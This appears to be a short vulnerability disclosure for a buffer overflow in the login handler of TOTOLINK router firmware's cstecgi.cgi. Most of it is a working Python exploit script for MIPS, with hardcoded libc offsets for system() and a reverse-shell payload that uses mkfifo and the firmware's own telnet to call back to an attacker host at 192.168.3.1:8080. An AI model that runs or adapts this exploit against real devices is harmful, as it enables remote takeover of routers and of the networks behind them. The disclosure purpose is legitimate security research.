Vendor:http://totolink.net/
Firmware:http://totolink.net/home/menu/detail/menu_listtpl/download/id/185/ids/36.html
V7.4cu.2313_B20191024
main() of csteccgi.cgi reads v15 from http POST body
When query string of http request contains "action=login" and "flag=ie8", v52 is constructed using sprinf. If v15 has excessive length, v52 will have a bufer overflow vulnerability
from pwn import *
context(os="linux", arch="mips", log_level="debug", bits=32, endian="little")
libc_base = 0x77ecc000
payload = flat({
5684: libc_base + 0x0004FEB0, # system
5700: libc_base + 0x00016BC8, # ra
},filler=b'a')
payload += cyclic(16)
payload += b"""TF=$(mktemp -u);mkfifo $TF && telnet 192.168.3.1 8080 0<$TF | sh 1>$TF\n"""
packet = (
b"""POST /cgi-bin/cstecgi.cgi?action=login&flag=ie8 HTTP/1.1\r\n"""
+b"""Host: 192.168.3.2\r\n"""
+b"""User-Agent: curl/7.81.0\r\n"""
+b"""Accept: */*\r\n"""
+b"""Content-Length: """ +str(len(payload)).encode()+ b"""\r\n"""
+b"""Content-Type: application/x-www-form-urlencoded\r\n"""
+b"""\r\n"""
+payload
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.3.2", 80))
print(packet)
s.send(packet)
Here we use firmware's built-in busybox-telnet to reverse shell. Further more, an attacker can construct payload to execute arbitry command or shellcode.